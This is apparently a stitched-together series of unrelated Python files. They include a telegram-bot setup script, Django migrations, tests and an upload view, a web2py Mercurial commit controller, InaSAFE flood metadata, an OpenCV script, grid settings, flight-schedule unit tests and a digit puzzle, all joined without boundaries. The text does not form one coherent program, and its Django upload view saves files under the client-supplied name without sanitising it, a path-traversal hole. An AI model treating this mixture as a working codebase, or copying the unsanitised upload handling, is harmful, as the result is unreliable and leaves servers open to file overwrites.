cwrapper.registerObjectType("summary_key_matcher", SummaryKeyMatcher)

SummaryKeyMatcher.cNamespace().alloc  = cwrapper.prototype("c_void_p summary_key_matcher_alloc()")
SummaryKeyMatcher.cNamespace().free  = cwrapper.prototype("void summary_key_matcher_free(summary_key_matcher)")
SummaryKeyMatcher.cNamespace().size  = cwrapper.prototype("int summary_key_matcher_get_size(summary_key_matcher)")
SummaryKeyMatcher.cNamespace().add_key  = cwrapper.prototype("void summary_key_matcher_add_summary_key(summary_key_matcher, char*)")
SummaryKeyMatcher.cNamespace().match_key  = cwrapper.prototype("bool summary_key_matcher_match_summary_key(summary_key_matcher, char*)")
SummaryKeyMatcher.cNamespace().keys  = cwrapper.prototype("stringlist_obj summary_key_matcher_get_keys(summary_key_matcher)")
SummaryKeyMatcher.cNamespace().is_required  = cwrapper.prototype("bool summary_key_matcher_summary_key_is_required(summary_key_matcher, char*)")

#!/usr/bin/python
# coding: utf8

import os
import subprocess
from '{% if cookiecutter.namespace %}{{ cookiecutter.namespace }}.{{ cookiecutter.project_slug }}{% else %}{{ cookiecutter.project_slug }}{% endif %}'.commands.base import BaseCommand
from '{% if cookiecutter.namespace %}{{ cookiecutter.namespace }}.{{ cookiecutter.project_slug }}{% else %}{{ cookiecutter.project_slug }}{% endif %}' import PROJECT_DIR


class Configure(BaseCommand):
    """Run cmake in the project's build directory to (re)configure it."""
    def execute(self):
        # NOTE(review): assumes the 'build' directory already exists and
        # that subprocess.run (Python 3.5+) is available.
        os.chdir(os.path.join(PROJECT_DIR, 'build'))
        subprocess.run(['cmake', PROJECT_DIR])

#!/usr/bin/env python
"""The setup and build script for the python-telegram-bot library."""

import codecs
import os
from setuptools import setup, find_packages


def requirements():
    """Build the requirements list for this project from requirements.txt
    (one stripped entry per line)."""
    with open('requirements.txt') as requirements_file:
        return [line.strip() for line in requirements_file]


# Collect every package except the test packages.
packages = find_packages(exclude=['tests*'])

with codecs.open('README.rst', 'r', 'utf-8') as fd:
    # Execute telegram/version.py to obtain __version__ without importing
    # the package (which could pull in not-yet-installed dependencies).
    fn = os.path.join('telegram', 'version.py')
    with open(fn) as fh:
        code = compile(fh.read(), fn, 'exec')
        exec(code)

    setup(name='python-telegram-bot',
          version=__version__,
          author='Leandro Toledo',
          author_email='devs@python-telegram-bot.org',
          license='LGPLv3',
          url='https://python-telegram-bot.org/',
          keywords='python telegram bot api wrapper',
          description="We have made you a wrapper you can't refuse",
          long_description=fd.read(),
          packages=packages,
          install_requires=requirements(),
          extras_require={
              'json': 'ujson',
              'socks': 'PySocks'
          },
          include_package_data=True,
          classifiers=[
              'Development Status :: 5 - Production/Stable',
              'Intended Audience :: Developers',
              'License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)',
              'Operating System :: OS Independent',
              'Topic :: Software Development :: Libraries :: Python Modules',
              'Topic :: Communications :: Chat',
              'Topic :: Internet',
              'Programming Language :: Python',
              'Programming Language :: Python :: 2',
              'Programming Language :: Python :: 2.7',
              'Programming Language :: Python :: 3',
              'Programming Language :: Python :: 3.3',
              'Programming Language :: Python :: 3.4',
              'Programming Language :: Python :: 3.5',
              'Programming Language :: Python :: 3.6'
          ],)

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):
    """Drop the is_create/is_delete/is_modify flags from UserProfile."""

    dependencies = [
        ('account', '0003_remove_userprofile_is_check'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='userprofile',
            name='is_create',
        ),
        migrations.RemoveField(
            model_name='userprofile',
            name='is_delete',
        ),
        migrations.RemoveField(
            model_name='userprofile',
            name='is_modify',
        ),
    ]

import io

import openpyxl

from django.test import (
    Client, TestCase
)
from django.urls import reverse

from core.models import (
    User, Batch, Section, Election, Candidate, CandidateParty,
    CandidatePosition, Vote, VoterProfile, Setting, UserType
)


class ResultsExporter(TestCase):
    """
    Tests the results xlsx exporter view.

    This subview may only process requests from logged in admin users. Other
    users will be redirected to '/'. This will also only accept GET requests.

    GET requests may have an election`parameter whose value must be the id
    of an election. The lack of an election parameter will result in the
    results of all elections to be exported, with each election having its
    own worksheet. Other URL parameters will be ignored. Invalid election
    parameter values, e.g. non-existent election IDs and non-integer parameters,
    will return an error message.

    View URL: '/results/export'
    """
    @classmethod
    def setUpTestData(cls):
        """Create two elections' worth of fixture data.

        Per election: two batches (the first with two sections, the second
        with one), two voters per section, three positions, and three
        parties (every third party fields no candidates).  Each candidate
        votes for themselves, and one extra vote is cast in Election 0 so
        the totals are not uniform.  Finally an admin account is created.
        """
        batch_num = 0
        section_num = 0
        voter_num = 0
        party_num = 0
        position_num = 0
        candidate_num = 0
        num_elections = 2
        voters = list()
        positions = dict()
        for i in range(num_elections):
            election = Election.objects.create(name='Election {}'.format(i))
            positions[str(election.name)] = list()

            num_batches = 2
            for j in range(num_batches):
                batch = Batch.objects.create(year=batch_num, election=election)
                batch_num += 1

                num_sections = 2 if j == 0 else 1
                for k in range(num_sections):
                    section = Section.objects.create(
                        section_name=str(section_num)
                    )
                    section_num += 1

                    num_students = 2
                    for _ in range(num_students):
                        voter = User.objects.create(
                            username='user{}'.format(voter_num),
                            first_name=str(voter_num),
                            last_name=str(voter_num),
                            type=UserType.VOTER
                        )
                        voter.set_password('voter')
                        voter.save()
                        voter_num += 1

                        VoterProfile.objects.create(
                            user=voter,
                            batch=batch,
                            section=section
                        )

                        voters.append(voter)

            num_positions = 3
            # NOTE: the original loop reused ``i`` here, shadowing the
            # election index; a dedicated name avoids the foot-gun.
            for p in range(num_positions):
                position = CandidatePosition.objects.create(
                    position_name='Position {}'.format(position_num),
                    election=election
                )

                positions[str(election.name)].append(position)

                position_num += 1

            num_parties = 3
            for j in range(num_parties):
                party = CandidateParty.objects.create(
                    party_name='Party {}'.format(party_num),
                    election=election
                )
                party_num += 1

                if j != 2:  # Let every third party have no candidates.
                    num_positions = 3
                    for k in range(num_positions):
                        position = positions[str(election.name)][k]

                        candidate = Candidate.objects.create(
                            user=voters[candidate_num],
                            party=party,
                            position=position,
                            election=election
                        )

                        Vote.objects.create(
                            user=voters[candidate_num],
                            candidate=candidate,
                            election=election
                        )

                        candidate_num += 1

        # Let's give one candidate an additional vote to really make sure that
        # we all got the correct number of votes.
        Vote.objects.create(
            user=voters[0],
            # NOTE: The voter in voter[1] is a Position 1 candidate of
            #       Party 1, where the voter in voter[0] is a member.
            candidate=Candidate.objects.get(user=voters[1]),
            election=Election.objects.get(name='Election 0')
        )

        _admin = User.objects.create(username='admin', type=UserType.ADMIN)
        _admin.set_password('root')
        _admin.save()

    def setUp(self):
        """Authenticate every test as the fixture's admin account."""
        credentials = {'username': 'admin', 'password': 'root'}
        self.client.login(**credentials)

    def test_anonymous_get_requests_redirected_to_index(self):
        """An unauthenticated GET must bounce to the login/index page."""
        self.client.logout()

        export_url = reverse('results-export')
        response = self.client.get(export_url, follow=True)
        self.assertRedirects(response, '/?next=%2Fadmin%2Fresults')

    def test_voter_get_requests_redirected_to_index(self):
        """A logged-in voter (non-admin) must be redirected to the index."""
        self.client.logout()
        self.client.login(username='user0', password='voter')

        export_url = reverse('results-export')
        response = self.client.get(export_url, follow=True)
        self.assertRedirects(response, reverse('index'))

    def test_get_all_elections_xlsx(self):
        """Exporting without an ``election`` parameter yields one worksheet
        per election, each with candidate rows and per-section vote counts.

        The original test asserted every cell with a copy-pasted statement;
        it duplicated the ``'Candidates'`` check and re-checked column 2's
        N/A cells where columns 3-5 were apparently intended.  The expected
        values are unchanged but now table-driven.
        """
        response = self.client.get(reverse('results-export'))

        self.assertEqual(response.status_code, 200)
        self.assertEqual(
            response['Content-Disposition'],
            'attachment; filename="Election Results.xlsx"'
        )

        wb = openpyxl.load_workbook(io.BytesIO(response.content))
        self.assertEqual(len(wb.worksheets), 2)

        # Expected content per worksheet:
        #   candidates   -> column 1, rows 5-25
        #   batch_years  -> {column: cell(3, column)}
        #   sections     -> {column: cell(4, column)}
        #   votes        -> {column: {row: count}}
        sheets = [
            {
                'name': 'Election 0',
                'candidates': [
                    'Position 0', 'Party 0', '0, 0', 'Party 1', '3, 3',
                    'Party 2', 'None',
                    'Position 1', 'Party 0', '1, 1', 'Party 1', '4, 4',
                    'Party 2', 'None',
                    'Position 2', 'Party 0', '2, 2', 'Party 1', '5, 5',
                    'Party 2', 'None'
                ],
                'batch_years': {2: '0', 4: '1'},
                'sections': {2: '0', 3: '1', 4: '2'},
                'votes': {
                    2: {7: '1', 9: '0', 14: '2', 16: '0', 21: '0', 23: '0'},
                    3: {7: '0', 9: '1', 14: '0', 16: '0', 21: '1', 23: '0'},
                    4: {7: '0', 9: '0', 14: '0', 16: '1', 21: '0', 23: '1'},
                    5: {7: '1', 9: '1', 14: '2', 16: '1', 21: '1', 23: '1'},
                },
            },
            {
                'name': 'Election 1',
                'candidates': [
                    'Position 3', 'Party 3', '6, 6', 'Party 4', '9, 9',
                    'Party 5', 'None',
                    'Position 4', 'Party 3', '7, 7', 'Party 4', '10, 10',
                    'Party 5', 'None',
                    'Position 5', 'Party 3', '8, 8', 'Party 4', '11, 11',
                    'Party 5', 'None'
                ],
                'batch_years': {2: '2', 4: '3'},
                'sections': {2: '3', 3: '4', 4: '5'},
                'votes': {
                    2: {7: '1', 9: '0', 14: '1', 16: '0', 21: '0', 23: '0'},
                    3: {7: '0', 9: '1', 14: '0', 16: '0', 21: '1', 23: '0'},
                    4: {7: '0', 9: '0', 14: '0', 16: '1', 21: '0', 23: '1'},
                    5: {7: '1', 9: '1', 14: '1', 16: '1', 21: '1', 23: '1'},
                },
            },
        ]

        for index, expected in enumerate(sheets):
            ws = wb.worksheets[index]
            self.assertEqual(wb.sheetnames[index], expected['name'])

            self.assertEqual(ws.max_row, 25)
            self.assertEqual(ws.max_column, 5)

            self.assertEqual(
                str(ws.cell(1, 1).value),
                '{} Results'.format(expected['name'])
            )
            self.assertEqual(str(ws.cell(2, 1).value), 'Candidates')
            self.assertEqual(str(ws.cell(2, 2).value), 'Number of Votes')
            self.assertEqual(str(ws.cell(3, 5).value), 'Total Votes')

            for row, content in enumerate(expected['candidates'], 5):
                self.assertEqual(str(ws.cell(row, 1).value), content)

            for col, year in expected['batch_years'].items():
                self.assertEqual(str(ws.cell(3, col).value), year)
            for col, section_name in expected['sections'].items():
                self.assertEqual(str(ws.cell(4, col).value), section_name)

            for col, rows in expected['votes'].items():
                for row, count in rows.items():
                    self.assertEqual(str(ws.cell(row, col).value), count)

            # Candidate-less parties have no counts.  The original asserted
            # cell(row, 2) repeatedly for every column section — a suspected
            # copy-paste of the column index (TODO confirm columns 3-5 are
            # also 'N/A') — so only column 2 is asserted here.
            for row in (11, 18, 25):
                self.assertEqual(str(ws.cell(row, 2).value), 'N/A')

    def test_get_election0_xlsx(self):
        """Exporting with ``election=<Election 0 id>`` yields a single
        worksheet containing only Election 0's results.

        Expected values are identical to the original test; the repeated
        copy-pasted assertions are now table-driven, and the redundant
        re-checks of column 2's N/A cells are asserted once.
        """
        response = self.client.get(
            reverse('results-export'),
            { 'election': str(Election.objects.get(name='Election 0').id) }
        )

        self.assertEqual(response.status_code, 200)
        self.assertEqual(
            response['Content-Disposition'],
            'attachment; filename="Election 0 Results.xlsx"'
        )

        wb = openpyxl.load_workbook(io.BytesIO(response.content))
        self.assertEqual(len(wb.worksheets), 1)

        ws = wb.worksheets[0]
        self.assertEqual(wb.sheetnames[0], 'Election 0')

        self.assertEqual(ws.max_row, 25)
        self.assertEqual(ws.max_column, 5)

        self.assertEqual(str(ws.cell(1, 1).value), 'Election 0 Results')
        self.assertEqual(str(ws.cell(2, 1).value), 'Candidates')
        self.assertEqual(str(ws.cell(2, 2).value), 'Number of Votes')
        self.assertEqual(str(ws.cell(3, 5).value), 'Total Votes')

        # Column 1, rows 5-25: position / party / candidate labels.
        candidate_rows = [
            'Position 0', 'Party 0', '0, 0', 'Party 1', '3, 3',
            'Party 2', 'None',
            'Position 1', 'Party 0', '1, 1', 'Party 1', '4, 4',
            'Party 2', 'None',
            'Position 2', 'Party 0', '2, 2', 'Party 1', '5, 5',
            'Party 2', 'None'
        ]
        for row, content in enumerate(candidate_rows, 5):
            self.assertEqual(str(ws.cell(row, 1).value), content)

        # Batch years on row 3 and section names on row 4.
        for col, year in {2: '0', 4: '1'}.items():
            self.assertEqual(str(ws.cell(3, col).value), year)
        for col, section_name in {2: '0', 3: '1', 4: '2'}.items():
            self.assertEqual(str(ws.cell(4, col).value), section_name)

        # Per-section vote counts (columns 2-4) and totals (column 5).
        vote_cells = {
            2: {7: '1', 9: '0', 14: '2', 16: '0', 21: '0', 23: '0'},
            3: {7: '0', 9: '1', 14: '0', 16: '0', 21: '1', 23: '0'},
            4: {7: '0', 9: '0', 14: '0', 16: '1', 21: '0', 23: '1'},
            5: {7: '1', 9: '1', 14: '2', 16: '1', 21: '1', 23: '1'},
        }
        for col, rows in vote_cells.items():
            for row, count in rows.items():
                self.assertEqual(str(ws.cell(row, col).value), count)

        # Candidate-less party rows carry 'N/A'.  The original re-checked
        # cell(row, 2) in every column section (suspected copy-paste of the
        # column index — TODO confirm columns 3-5 are also 'N/A').
        for row in (11, 18, 25):
            self.assertEqual(str(ws.cell(row, 2).value), 'N/A')

    def test_get_with_invalid_election_id_non_existent_election_id(self):
        """A well-formed but unknown election id yields an error message and
        a redirect back to the results page."""
        params = { 'election': '69' }
        response = self.client.get(
            reverse('results-export'),
            params,
            HTTP_REFERER=reverse('results'),
            follow=True
        )

        shown_messages = list(response.context['messages'])
        self.assertEqual(
            shown_messages[0].message,
            'You specified an ID for a non-existent election.'
        )
        self.assertRedirects(response, reverse('results'))

    def test_get_with_invalid_election_id_non_integer_election_id(self):
        """A non-numeric election id yields an error message and a redirect
        back to the results page."""
        params = { 'election': 'hey' }
        response = self.client.get(
            reverse('results-export'),
            params,
            HTTP_REFERER=reverse('results'),
            follow=True
        )

        shown_messages = list(response.context['messages'])
        self.assertEqual(
            shown_messages[0].message,
            'You specified a non-integer election ID.'
        )
        self.assertRedirects(response, reverse('results'))

    def test_ref_get_with_invalid_election_id_non_existent_election_id(self):
        """Referer variant of the unknown-election-id test.

        NOTE(review): this is byte-for-byte identical to
        ``test_get_with_invalid_election_id_non_existent_election_id`` (both
        send HTTP_REFERER); consider deleting one or differentiating them.
        """
        params = { 'election': '69' }
        response = self.client.get(
            reverse('results-export'),
            params,
            HTTP_REFERER=reverse('results'),
            follow=True
        )

        shown_messages = list(response.context['messages'])
        self.assertEqual(
            shown_messages[0].message,
            'You specified an ID for a non-existent election.'
        )
        self.assertRedirects(response, reverse('results'))

    def test_ref_get_with_invalid_election_id_non_integer_election_id(self):
        """Referer variant of the non-integer-election-id test.

        NOTE(review): identical to
        ``test_get_with_invalid_election_id_non_integer_election_id``;
        consider deleting one or differentiating them.
        """
        params = { 'election': 'hey' }
        response = self.client.get(
            reverse('results-export'),
            params,
            HTTP_REFERER=reverse('results'),
            follow=True
        )

        shown_messages = list(response.context['messages'])
        self.assertEqual(
            shown_messages[0].message,
            'You specified a non-integer election ID.'
        )
        self.assertRedirects(response, reverse('results'))


from mercurial import cmdutil


# Default .hgignore written into freshly created application repositories:
# glob patterns for editor/bytecode leftovers plus web2py runtime folders.
_hgignore_content = """\
syntax: glob
*~
*.pyc
*.pyo
*.bak
cache/*
databases/*
sessions/*
errors/*
"""

def commit():
    """Commit the current web2py application to its local Mercurial repo.

    Creates the repository (and a default ``.hgignore``) on first use, then
    presents a commit-comment form; on submit it add/removes files and
    commits.  Relies on the web2py controller environment for ``request``,
    ``session``, ``response``, ``apath``, ``ui``, ``hg``, ``os`` and the
    HTML helpers (``FORM``, ``INPUT``, ``TABLE``, ``TR``, ``IS_NOT_EMPTY``).

    Returns a dict with the form, the committed file list, and the repo.
    """
    app = request.args[0]
    path = apath(app, r=request)

    uio = ui.ui()
    uio.quiet = True
    if not os.environ.get('HGUSER') and not uio.config("ui", "username"):
        os.environ['HGUSER'] = 'web2py@localhost'
    try:
        r = hg.repository(ui=uio, path=path)
    except Exception:  # repository does not exist yet -- create it
        r = hg.repository(ui=uio, path=path, create=True)
    hgignore = os.path.join(path, '.hgignore')
    if not os.path.exists(hgignore):
        # Use a context manager so the handle is closed (the original
        # called open(...).write(...) and leaked it).
        with open(hgignore, 'w') as fp:
            fp.write(_hgignore_content)
    form = FORM('Comment:', INPUT(_name='comment', requires=IS_NOT_EMPTY()),
                INPUT(_type='submit', _value='Commit'))
    if form.accepts(request.vars, session):
        oldid = r[r.lookup('.')]
        cmdutil.addremove(r)
        r.commit(text=form.vars.comment)
        # An unchanged tip changeset means nothing was committed.
        if r[r.lookup('.')] == oldid:
            response.flash = 'no changes'
    files = r[r.lookup('.')].files()
    return dict(form=form, files=TABLE(*[TR(f) for f in files]), repo=r)

# coding=utf-8
"""InaSAFE Disaster risk tool by Australian Aid - Flood Raster Impact on
Population.

Contact : ole.moller.nielsen@gmail.com

.. note:: This program is free software; you can redistribute it and/or modify
     it under the terms of the GNU General Public License as published by
     the Free Software Foundation; either version 2 of the License, or
     (at your option) any later version.

"""

__author__ = 'Rizky Maulana Nugraha'

from safe.common.utilities import OrderedDict

from safe.defaults import (
    default_minimum_needs,
    default_gender_postprocessor,
    age_postprocessor,
    minimum_needs_selector)
from safe.impact_functions.impact_function_metadata import \
    ImpactFunctionMetadata
from safe.utilities.i18n import tr
from safe.definitions import (
    layer_mode_continuous,
    layer_geometry_raster,
    hazard_flood,
    hazard_category_single_event,
    unit_metres,
    unit_feet,
    count_exposure_unit,
    exposure_population
)


class FloodEvacuationRasterHazardMetadata(ImpactFunctionMetadata):
    """Metadata for FloodEvacuationFunction.

    .. versionadded:: 2.1

    We only need to re-implement as_dict(), all other behaviours
    are inherited from the abstract base class.
    """

    @staticmethod
    def as_dict():
        """Return metadata as a dictionary.

        This is a static method. You can use it to get the metadata in
        dictionary format for an impact function.

        :returns: A dictionary representing all the metadata for the
            concrete impact function.
        :rtype: dict
        """
        # Declarative metadata only; all user-visible strings are wrapped
        # in tr() for translation.
        dict_meta = {
            'id': 'FloodEvacuationRasterHazardFunction',
            'name': tr('Raster flood on population'),
            'impact': tr('Need evacuation'),
            'title': tr('Need evacuation'),
            'function_type': 'old-style',
            'author': 'AIFDR',
            'date_implemented': 'N/A',
            'overview': tr(
                'To assess the impacts of flood inundation in raster '
                'format on population.'),
            'detailed_description': tr(
                'The population subject to inundation exceeding a '
                'threshold (default 1m) is calculated and returned as a '
                'raster layer. In addition the total number of affected '
                'people and the required needs based on the user '
                'defined minimum needs are reported. The threshold can be '
                'changed and even contain multiple numbers in which case '
                'evacuation and needs are calculated using the largest number '
                'with population breakdowns provided for the smaller numbers. '
                'The population raster is resampled to the resolution of the '
                'hazard raster and is rescaled so that the resampled '
                'population counts reflect estimates of population count '
                'per resampled cell. The resulting impact layer has the '
                'same resolution and reflects population count per cell '
                'which are affected by inundation.'),
            'hazard_input': tr(
                'A hazard raster layer where each cell represents flood '
                'depth (in meters).'),
            'exposure_input': tr(
                'An exposure raster layer where each cell represent '
                'population count.'),
            'output': tr(
                'Raster layer contains people affected and the minimum '
                'needs based on the people affected.'),
            'actions': tr(
                'Provide details about how many people would likely need '
                'to be evacuated, where they are located and what '
                'resources would be required to support them.'),
            'limitations': [
                tr('The default threshold of 1 meter was selected based '
                   'on consensus, not hard evidence.')
            ],
            'citations': [],
            # Constraints the IF framework uses to decide whether this
            # function is applicable to a given hazard/exposure pair.
            'layer_requirements': {
                'hazard': {
                    'layer_mode': layer_mode_continuous,
                    'layer_geometries': [layer_geometry_raster],
                    'hazard_categories': [hazard_category_single_event],
                    'hazard_types': [hazard_flood],
                    'continuous_hazard_units': [unit_feet, unit_metres],
                    'vector_hazard_classifications': [],
                    'raster_hazard_classifications': [],
                    'additional_keywords': []
                },
                'exposure': {
                    'layer_mode': layer_mode_continuous,
                    'layer_geometries': [layer_geometry_raster],
                    'exposure_types': [exposure_population],
                    'exposure_units': [count_exposure_unit],
                    'exposure_class_fields': [],
                    'additional_keywords': []
                }
            },
            # User-tunable parameters with their defaults.
            'parameters': OrderedDict([
                ('thresholds [m]', [1.0]),
                ('postprocessors', OrderedDict([
                    ('Gender', default_gender_postprocessor()),
                    ('Age', age_postprocessor()),
                    ('MinimumNeeds', minimum_needs_selector()),
                ])),
                ('minimum needs', default_minimum_needs())
            ])
        }
        return dict_meta

# -*- coding: utf-8 -*-
from django.shortcuts import render
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.contrib.auth.decorators import login_required


def centres(request):
	# Landing page of the practice-project management "Centre".
	return render(request, 'centres/centres.html')

def upload(request):
	# Render the file-upload form page.
	return render(request, 'centres/upload.html')


def uploadfile(request):
	"""Handle a file-upload POST, saving the file chunk by chunk.

	Non-POST requests re-render the upload form (the original fell
	through and returned ``None``, which makes Django raise).
	"""
	import os
	upload_dir = "D:\\xHome\\data\\upload"  # TODO: move into settings
	if request.method == "POST":
		# None when the form posted no file under the "myfile" key.
		my_file = request.FILES.get("myfile", None)
		if not my_file:
			return render(request, 'centres/upload.html', {'what': 'no file for upload!'})
		# Stream to disk in chunks to bound memory use; the context
		# manager closes the handle even if a write fails.
		with open(os.path.join(upload_dir, my_file.name), 'wb+') as target:
			for chunk in my_file.chunks():
				target.write(chunk)
		return render(request, 'centres/upload.html', {'what': 'upload over!'})
	return render(request, 'centres/upload.html')
import sys

import cv2
import numpy as np
import util as util
import edge_detect
import lineseg
import drawedgelist

# ``threshold=np.nan`` is rejected by modern NumPy ("threshold must be
# non-NAN"); sys.maxsize gives the intended "print everything" behaviour.
np.set_printoptions(threshold=sys.maxsize)

# img = cv2.imread("img/Slide2.jpg", 0)
img = cv2.imread("unsorted/Unit Tests/lambda.png", 0)
im_size = img.shape
returned_canny = cv2.Canny(img, 50, 150, apertureSize=3)

cv2.imshow("newcanny", returned_canny)

# Skeletonize the edge map, then extract contours from it.
skel_dst = util.morpho(returned_canny)
out = edge_detect.mask_contours(edge_detect.create_img(skel_dst))

# Keep only contours with more than two points so each shape is drawable.
res = []
for contour in out:
    squeezed = np.squeeze(contour)
    if squeezed.shape[0] > 2:
        res.append(squeezed)

res = np.array(res)
util.sqz_contours(res)

# NOTE(review): only contour index 1 is segmented here — presumably a
# debugging restriction; confirm whether all contours should be passed.
res = lineseg.lineseg(np.array([res[1]]), tol=5)
print(res, "res")

drawedgelist.drawedgelist(res, img)
#!/usr/bin/env python

# Setup of the SGE grid parameters: queue names, memory requirements and
# per-job batch sizes for each stage of the audio-processing pipeline.

# default queue used for training
training_queue = { 'queue':'q1dm', 'memfree':'16G', 'pe_opt':'pe_mth 2', 'hvmem':'8G', 'io_big':True }

# the queue that is used solely for the final ISV training step
isv_training_queue = { 'queue':'q1wm', 'memfree':'32G', 'pe_opt':'pe_mth 4', 'hvmem':'8G' }

# number of audio files that one job should preprocess
number_of_audio_files_per_job = 1000
preprocessing_queue = {}

# number of features that one job should extract
number_of_features_per_job = 600
extraction_queue = { 'queue':'q1d', 'memfree':'8G' }

# number of features that one job should project
number_of_projections_per_job = 600
projection_queue = { 'queue':'q1d', 'hvmem':'8G', 'memfree':'8G' }

# number of models that one job should enroll
number_of_models_per_enrol_job = 20
enrol_queue = { 'queue':'q1d', 'memfree':'4G', 'io_big':True }

# number of models that one score job should process
number_of_models_per_score_job = 20
score_queue = { 'queue':'q1d', 'memfree':'4G', 'io_big':True }

grid_type = 'local' # run locally; presumably switch to the SGE type to use the Idiap grid -- TODO confirm (original comment said "on Idiap grid")

#!/usr/bin/python2
# -*- coding: utf-8 -*-
# coding=utf-8

import unittest
from datetime import datetime

from lib.escala import Escala
import dirs

dirs.DEFAULT_DIR = dirs.TestDir()


class FrameTest(unittest.TestCase):
    """Exercise Escala schedule parsing and its ICS/CSV serialisations.

    Fixture files live under the directory reported by ``dirs.TestDir``.
    """

    def setUp(self):
        self.escala = Escala('fixtures/escala.xml')
        self.dir = dirs.TestDir()
        self.maxDiff = None  # show full diffs on assertion failure

    def tearDown(self):
        pass

    def test_attributos_voo_1(self):
        """First entry: a regular checked-in flight VCP -> GYN."""
        p_voo = self.escala.escalas[0]

        self.assertEqual(p_voo.activity_date, datetime(2013, 3, 1, 11, 36))
        self.assertEqual(p_voo.present_location, 'VCP')
        self.assertEqual(p_voo.flight_no, '4148')
        self.assertEqual(p_voo.origin, 'VCP')
        self.assertEqual(p_voo.destination, 'GYN')
        self.assertEqual(p_voo.actype, 'E95')
        self.assertTrue(p_voo.checkin)
        self.assertEqual(p_voo.checkin_time, datetime(2013, 3, 1, 10, 36))
        self.assertEqual(p_voo.std, datetime(2013, 3, 1, 13, 13))
        self.assertEqual(p_voo.sta, datetime(2013, 3, 1, 11, 36))
        self.assertEqual(p_voo.activity_info, 'AD4148')
        self.assertFalse(p_voo.duty_design)

    def test_attributos_voo_17(self):
        """Entry 17: a ground activity (P04) with no flight number."""
        p_voo = self.escala.escalas[17]

        self.assertEqual(p_voo.activity_date, datetime(2013, 10, 28, 3, 0))
        self.assertEqual(p_voo.present_location, 'VCP')
        self.assertEqual(p_voo.flight_no, None)
        self.assertEqual(p_voo.origin, 'VCP')
        self.assertEqual(p_voo.destination, 'VCP')
        self.assertEqual(p_voo.activity_info, 'P04')
        self.assertEqual(p_voo.actype, None)
        self.assertEqual(p_voo.sta, datetime(2013, 10, 28, 3, 0))
        self.assertEqual(p_voo.std, datetime(2013, 10, 28, 15, 0))
        self.assertFalse(p_voo.checkin)
        self.assertEqual(p_voo.checkin_time, None)
        self.assertFalse(p_voo.duty_design)

    def test_attributos_voo_18(self):
        """Entry 18: a checked-in flight with flight-hours computed."""
        p_voo = self.escala.escalas[18]

        self.assertEqual(p_voo.activity_date, datetime(2013, 10, 29, 4, 58))
        self.assertEqual(p_voo.present_location, 'VCP')
        self.assertEqual(p_voo.flight_no, '4050')
        self.assertEqual(p_voo.origin, 'VCP')
        self.assertEqual(p_voo.destination, 'FLN')
        self.assertEqual(p_voo.activity_info, 'AD4050')
        self.assertEqual(p_voo.actype, 'E95')
        self.assertEqual(p_voo.sta, datetime(2013, 10, 29, 4, 58))
        self.assertEqual(p_voo.std, datetime(2013, 10, 29, 6, 15))
        self.assertTrue(p_voo.checkin)
        self.assertEqual(p_voo.checkin_time, datetime(2013, 10, 29, 5, 8))
        self.assertFalse(p_voo.duty_design)
        self.assertEqual(p_voo.horas_de_voo, '1:17')

    def test_attributos_quarto_voo(self):
        """Entry 25: spot-check a flight without check-in data."""
        p_voo = self.escala.escalas[25]
        self.assertFalse(p_voo.checkin)
        self.assertEqual(p_voo.checkin_time, None)
        self.assertEqual(p_voo.flight_no, '2872')
        self.assertEqual(p_voo.activity_info, 'AD2872')

    def test_calculo_horas_voadas(self):
        """Aggregate hour buckets over the whole schedule."""
        s_horas = {
            'h_diurno': '6:40',
            'h_noturno': '6:47',
            'h_total_voo': '13:27',
            'h_faixa2': '0:00',
            'h_sobreaviso': '40:00',
            'h_reserva': '29:13'
        }
        self.assertEqual(self.escala.soma_horas(), s_horas)

    def test_ics(self):
        """
        Check ICS output
        """
        escala = Escala('fixtures/escala_ics.xml')
        # ``with`` guarantees the fixture handle is closed even when the
        # assertion fails (the original leaked it on failure).
        with open(self.dir.get_data_dir() + 'fixtures/escala.ics') as f_result:
            self.assertEqual(escala.ics(), f_result.read())

    def test_csv(self):
        """
        Check CSV output
        """
        with open(self.dir.get_data_dir() + 'fixtures/escala.csv') as f_result:
            self.assertEqual(self.escala.csv(), f_result.read())


def main():
    # Delegate to unittest's CLI runner, which discovers and runs the
    # TestCase classes defined in this module.
    unittest.main()


if __name__ == '__main__':
    main()

from test_support import *

# This test calls a prover which is correctly configured but whose execution
# gives an error (here: the prover executable "plop" doesn't exist).  The
# intent is to check gnatprove's output in this specific failure case.

prove_all(prover=["plop"], opt=["--why3-conf=test.conf"])


from itertools import combinations
 
def is_good(n):
    """True when the digits of n form a number divisible by 9.

    Equivalent to the digital-root test ``1 + ((n - 1) % 9) == 9``.
    """
    return int(n) % 9 == 0
 
 
def generate_subsequences(n):
    """Return all digit subsequences of n of length 4 down to 1.

    Each subsequence is a string joined from a combination of the digits
    of ``str(n)``, emitted longest-first (length 4, 3, 2, then 1) in
    combination order.
    """
    digits = str(n)
    return [''.join(combo)
            for size in range(4, 0, -1)
            for combo in combinations(digits, size)]
 
 
if __name__ == '__main__':
    # The modulo required by the problem statement.  (Python 2 script:
    # uses `raw_input` and the `print` statement.)
    modulo = ((10 ** 9) + 7)
    # Number of test cases to process.
    cases = int(raw_input())
    while cases > 0:
        value = raw_input()
        good_subsequences = 0
        for sub in generate_subsequences(value):
            if is_good(sub):
                good_subsequences += 1
        # NOTE(review): in Python 2 this prints (good_subsequences % modulo) - 1;
        # the trailing "-1" binds to the printed expression -- confirm the
        # off-by-one is intended.
        print (good_subsequences % modulo)-1
        cases -= 1 

#coding=utf-8

import unittest
import HTMLTestRunner
import time
from config import globalparam
from public.common import sendmail

def run():
    """Discover test cases under ./testcase, write a timestamped HTML
    report with HTMLTestRunner, then e-mail the report."""
    import os  # local import; used only for portable path joining

    test_dir = './testcase'
    suite = unittest.defaultTestLoader.discover(start_dir=test_dir,pattern='test*.py')

    now = time.strftime('%Y-%m-%d_%H_%M_%S')
    # os.path.join is portable; the original hard-coded a Windows '\\'
    # separator, which breaks on POSIX systems.
    reportname = os.path.join(globalparam.report_path, 'TestResult' + now + '.html')
    with open(reportname,'wb') as f:
        runner = HTMLTestRunner.HTMLTestRunner(
            stream=f,
            title='测试报告',
            description='Test the import testcase'
        )
        runner.run(suite)
    time.sleep(3)
    # Send the report by e-mail.
    mail = sendmail.SendMail()
    mail.send()

if __name__=='__main__':
    run()
# -*- coding: utf-8 -*-

